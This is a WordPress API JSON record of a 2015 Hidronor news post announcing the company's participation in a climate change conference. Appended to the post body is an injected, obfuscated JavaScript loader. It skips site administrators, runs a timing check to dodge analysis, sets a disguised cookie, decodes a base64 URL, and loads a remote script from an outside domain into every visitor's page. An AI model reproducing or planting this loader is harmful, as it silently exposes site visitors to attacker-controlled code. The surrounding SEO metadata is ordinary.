{"id":2818,"date":"2015-06-07T16:01:48","date_gmt":"2015-06-07T16:01:48","guid":{"rendered":"http:\/\/www.hidronor.cl\/?p=2818"},"modified":"2026-01-20T14:16:09","modified_gmt":"2026-01-20T18:16:09","slug":"cambio-climatico-sera-abordado-en-el-congreso","status":"publish","type":"post","link":"https:\/\/www.hidronor.cl\/en\/cambio-climatico-sera-abordado-en-el-congreso\/","title":{"rendered":"Climate change will be addressed in Congress"},"content":{"rendered":"<p>Published on June 7, 2015.-<\/p>\n<p><strong>Strategies and management for the challenges around Water, Waste and Recycling<\/strong> The<em> International Conference on Climate Change: Perspective from the Southern Cone<\/em>, to be held at AmbientAL 2015, will focus on the issue of climate change, waste management, water management and non-fossil energy sources. In this instance, Hidronor will participate talking about its national experience in this regard. Frederik Evendt, General Manager of Hidronor, assures that it will be an excellent platform to give advice and internal management of industrial, hazardous or residential waste; characterization, remediation of contaminated sites, transportation, revaluation, treatment and final disposal of the same, services offered by Hidronor, with the highest national and international standards in terms of safety, environment and quality. Source: Econom\u00eda y Negocios online, June 7, 2015. Check the full article <a href=\"http:\/\/www.economiaynegocios.cl\/noticias\/noticias.asp?id=151540\">here<\/a>.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Publicada el 07 de junio del 2015.- Estrategias y gesti\u00f3n para los desaf\u00edos en torno al Agua, Residuos y Reciclaje El Congreso Internacional Cambio Clim\u00e1tico: Perspectiva desde el Cono Sur, a realizar en AmbientAL 2015, &nbsp;estar\u00e1 enfocado en el tema del cambio clim\u00e1tico, la gesti\u00f3n de residuos, gesti\u00f3n de aguas y fuentes de energ\u00eda no [&hellip;]<\/p>","protected":false},"author":7,"featured_media":2821,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"footnotes":""},"categories":[4,9],"tags":[],"class_list":["post-2818","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias","category-noticias-industria"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.1.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Cambio clim\u00e1tico ser\u00e1 abordado en el Congreso<\/title>\n<meta name=\"description\" content=\"Hidronor participar\u00e1 hablando de su experiencia nacional respecto al cambio clim\u00e1tico.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.hidronor.cl\/en\/cambio-climatico-sera-abordado-en-el-congreso\/\" \/>\n<meta property=\"og:locale\" content=\"en_GB\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cambio clim\u00e1tico ser\u00e1 abordado en el Congreso\" \/>\n<meta property=\"og:description\" content=\"Hidronor participar\u00e1 hablando de su experiencia nacional respecto al cambio clim\u00e1tico.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.hidronor.cl\/en\/cambio-climatico-sera-abordado-en-el-congreso\/\" \/>\n<meta property=\"og:site_name\" content=\"Hidronor\" \/>\n<meta property=\"article:published_time\" content=\"2015-06-07T16:01:48+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-01-20T18:16:09+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.hidronor.cl\/hidronor\/wp-content\/uploads\/2015\/06\/Sustentabilidad_-18.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"512\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Carlos Cisternas\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Carlos Cisternas\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimated reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/\"},\"author\":{\"name\":\"Carlos Cisternas\",\"@id\":\"https:\/\/www.hidronor.cl\/#\/schema\/person\/dbfcc05e6afc0d69ed28244083d173b1\"},\"headline\":\"Cambio clim\u00e1tico ser\u00e1 abordado en el Congreso\",\"datePublished\":\"2015-06-07T16:01:48+00:00\",\"dateModified\":\"2026-01-20T18:16:09+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/\"},\"wordCount\":165,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.hidronor.cl\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.hidronor.cl\/hidronor\/wp-content\/uploads\/2015\/06\/Sustentabilidad_-18.jpg\",\"articleSection\":[\"Noticias\",\"Noticias Industria\"],\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/\",\"url\":\"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/\",\"name\":\"Cambio clim\u00e1tico ser\u00e1 abordado en el Congreso\",\"isPartOf\":{\"@id\":\"https:\/\/www.hidronor.cl\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.hidronor.cl\/hidronor\/wp-content\/uploads\/2015\/06\/Sustentabilidad_-18.jpg\",\"datePublished\":\"2015-06-07T16:01:48+00:00\",\"dateModified\":\"2026-01-20T18:16:09+00:00\",\"description\":\"Hidronor participar\u00e1 hablando de su experiencia nacional respecto al cambio clim\u00e1tico.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#breadcrumb\"},\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#primaryimage\",\"url\":\"https:\/\/www.hidronor.cl\/hidronor\/wp-content\/uploads\/2015\/06\/Sustentabilidad_-18.jpg\",\"contentUrl\":\"https:\/\/www.hidronor.cl\/hidronor\/wp-content\/uploads\/2015\/06\/Sustentabilidad_-18.jpg\",\"width\":1280,\"height\":512,\"caption\":\"Cambio clim\u00e1tico\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.hidronor.cl\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Noticias\",\"item\":\"https:\/\/www.hidronor.cl\/category\/noticias\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Noticias Industria\",\"item\":\"https:\/\/www.hidronor.cl\/en\/category\/noticias\/noticias-industria\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Cambio clim\u00e1tico ser\u00e1 abordado en el Congreso\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.hidronor.cl\/#website\",\"url\":\"https:\/\/www.hidronor.cl\/\",\"name\":\"Hidronor\",\"description\":\"Especialistas en Tratamiento de Residuos Industriales\",\"publisher\":{\"@id\":\"https:\/\/www.hidronor.cl\/#organization\"},\"alternateName\":\"Hidronor\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.hidronor.cl\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-GB\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.hidronor.cl\/#organization\",\"name\":\"Hidronor - Especialistas en gesti\u00f3n y tratamiento de Residuos\",\"alternateName\":\"Hidronor\",\"url\":\"https:\/\/www.hidronor.cl\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/www.hidronor.cl\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.hidronor.cl\/hidronor\/wp-content\/uploads\/2022\/12\/Hidronor-1.png\",\"contentUrl\":\"https:\/\/www.hidronor.cl\/hidronor\/wp-content\/uploads\/2022\/12\/Hidronor-1.png\",\"width\":1230,\"height\":650,\"caption\":\"Hidronor - Especialistas en gesti\u00f3n y tratamiento de Residuos\"},\"image\":{\"@id\":\"https:\/\/www.hidronor.cl\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.youtube.com\/channel\/UCabqS9jT4mTFEIT_Zv8mFCg\/videos\",\"https:\/\/www.linkedin.com\/company\/hidronor\/\",\"https:\/\/www.instagram.com\/hidronor_chile\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.hidronor.cl\/#\/schema\/person\/dbfcc05e6afc0d69ed28244083d173b1\",\"name\":\"Carlos Cisternas\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/www.hidronor.cl\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/ea8b18f7dc8d4f58bbca62082909fc2fac713c687a15602e85ca6d9da8e0ec21?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/ea8b18f7dc8d4f58bbca62082909fc2fac713c687a15602e85ca6d9da8e0ec21?s=96&d=mm&r=g\",\"caption\":\"Carlos Cisternas\"},\"sameAs\":[\"https:\/\/www.hidronor.cl\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Climate change will be addressed in Congress","description":"Hidronor participar\u00e1 hablando de su experiencia nacional respecto al cambio clim\u00e1tico.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.hidronor.cl\/en\/cambio-climatico-sera-abordado-en-el-congreso\/","og_locale":"en_GB","og_type":"article","og_title":"Cambio clim\u00e1tico ser\u00e1 abordado en el Congreso","og_description":"Hidronor participar\u00e1 hablando de su experiencia nacional respecto al cambio clim\u00e1tico.","og_url":"https:\/\/www.hidronor.cl\/en\/cambio-climatico-sera-abordado-en-el-congreso\/","og_site_name":"Hidronor","article_published_time":"2015-06-07T16:01:48+00:00","article_modified_time":"2026-01-20T18:16:09+00:00","og_image":[{"width":1280,"height":512,"url":"https:\/\/www.hidronor.cl\/hidronor\/wp-content\/uploads\/2015\/06\/Sustentabilidad_-18.jpg","type":"image\/jpeg"}],"author":"Carlos Cisternas","twitter_misc":{"Written by":"Carlos Cisternas","Estimated reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#article","isPartOf":{"@id":"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/"},"author":{"name":"Carlos Cisternas","@id":"https:\/\/www.hidronor.cl\/#\/schema\/person\/dbfcc05e6afc0d69ed28244083d173b1"},"headline":"Cambio clim\u00e1tico ser\u00e1 abordado en el Congreso","datePublished":"2015-06-07T16:01:48+00:00","dateModified":"2026-01-20T18:16:09+00:00","mainEntityOfPage":{"@id":"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/"},"wordCount":165,"commentCount":0,"publisher":{"@id":"https:\/\/www.hidronor.cl\/#organization"},"image":{"@id":"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#primaryimage"},"thumbnailUrl":"https:\/\/www.hidronor.cl\/hidronor\/wp-content\/uploads\/2015\/06\/Sustentabilidad_-18.jpg","articleSection":["Noticias","Noticias Industria"],"inLanguage":"en-GB","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/","url":"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/","name":"Climate change will be addressed in Congress","isPartOf":{"@id":"https:\/\/www.hidronor.cl\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#primaryimage"},"image":{"@id":"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#primaryimage"},"thumbnailUrl":"https:\/\/www.hidronor.cl\/hidronor\/wp-content\/uploads\/2015\/06\/Sustentabilidad_-18.jpg","datePublished":"2015-06-07T16:01:48+00:00","dateModified":"2026-01-20T18:16:09+00:00","description":"Hidronor participar\u00e1 hablando de su experiencia nacional respecto al cambio clim\u00e1tico.","breadcrumb":{"@id":"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#breadcrumb"},"inLanguage":"en-GB","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/"]}]},{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#primaryimage","url":"https:\/\/www.hidronor.cl\/hidronor\/wp-content\/uploads\/2015\/06\/Sustentabilidad_-18.jpg","contentUrl":"https:\/\/www.hidronor.cl\/hidronor\/wp-content\/uploads\/2015\/06\/Sustentabilidad_-18.jpg","width":1280,"height":512,"caption":"Cambio clim\u00e1tico"},{"@type":"BreadcrumbList","@id":"https:\/\/www.hidronor.cl\/cambio-climatico-sera-abordado-en-el-congreso\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.hidronor.cl\/"},{"@type":"ListItem","position":2,"name":"Noticias","item":"https:\/\/www.hidronor.cl\/category\/noticias\/"},{"@type":"ListItem","position":3,"name":"Noticias Industria","item":"https:\/\/www.hidronor.cl\/en\/category\/noticias\/noticias-industria\/"},{"@type":"ListItem","position":4,"name":"Cambio clim\u00e1tico ser\u00e1 abordado en el Congreso"}]},{"@type":"WebSite","@id":"https:\/\/www.hidronor.cl\/#website","url":"https:\/\/www.hidronor.cl\/","name":"Hidronor","description":"Especialistas en Tratamiento de Residuos Industriales","publisher":{"@id":"https:\/\/www.hidronor.cl\/#organization"},"alternateName":"Hidronor","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.hidronor.cl\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-GB"},{"@type":"Organization","@id":"https:\/\/www.hidronor.cl\/#organization","name":"Hidronor - Especialistas en gesti\u00f3n y tratamiento de Residuos","alternateName":"Hidronor","url":"https:\/\/www.hidronor.cl\/","logo":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/www.hidronor.cl\/#\/schema\/logo\/image\/","url":"https:\/\/www.hidronor.cl\/hidronor\/wp-content\/uploads\/2022\/12\/Hidronor-1.png","contentUrl":"https:\/\/www.hidronor.cl\/hidronor\/wp-content\/uploads\/2022\/12\/Hidronor-1.png","width":1230,"height":650,"caption":"Hidronor - Especialistas en gesti\u00f3n y tratamiento de Residuos"},"image":{"@id":"https:\/\/www.hidronor.cl\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.youtube.com\/channel\/UCabqS9jT4mTFEIT_Zv8mFCg\/videos","https:\/\/www.linkedin.com\/company\/hidronor\/","https:\/\/www.instagram.com\/hidronor_chile\/"]},{"@type":"Person","@id":"https:\/\/www.hidronor.cl\/#\/schema\/person\/dbfcc05e6afc0d69ed28244083d173b1","name":"Carlos Cisternas","image":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/www.hidronor.cl\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/ea8b18f7dc8d4f58bbca62082909fc2fac713c687a15602e85ca6d9da8e0ec21?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/ea8b18f7dc8d4f58bbca62082909fc2fac713c687a15602e85ca6d9da8e0ec21?s=96&d=mm&r=g","caption":"Carlos Cisternas"},"sameAs":["https:\/\/www.hidronor.cl"]}]}},"_links":{"self":[{"href":"https:\/\/www.hidronor.cl\/en\/wp-json\/wp\/v2\/posts\/2818","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hidronor.cl\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hidronor.cl\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hidronor.cl\/en\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hidronor.cl\/en\/wp-json\/wp\/v2\/comments?post=2818"}],"version-history":[{"count":1,"href":"https:\/\/www.hidronor.cl\/en\/wp-json\/wp\/v2\/posts\/2818\/revisions"}],"predecessor-version":[{"id":24340,"href":"https:\/\/www.hidronor.cl\/en\/wp-json\/wp\/v2\/posts\/2818\/revisions\/24340"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.hidronor.cl\/en\/wp-json\/wp\/v2\/media\/2821"}],"wp:attachment":[{"href":"https:\/\/www.hidronor.cl\/en\/wp-json\/wp\/v2\/media?parent=2818"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hidronor.cl\/en\/wp-json\/wp\/v2\/categories?post=2818"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hidronor.cl\/en\/wp-json\/wp\/v2\/tags?post=2818"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}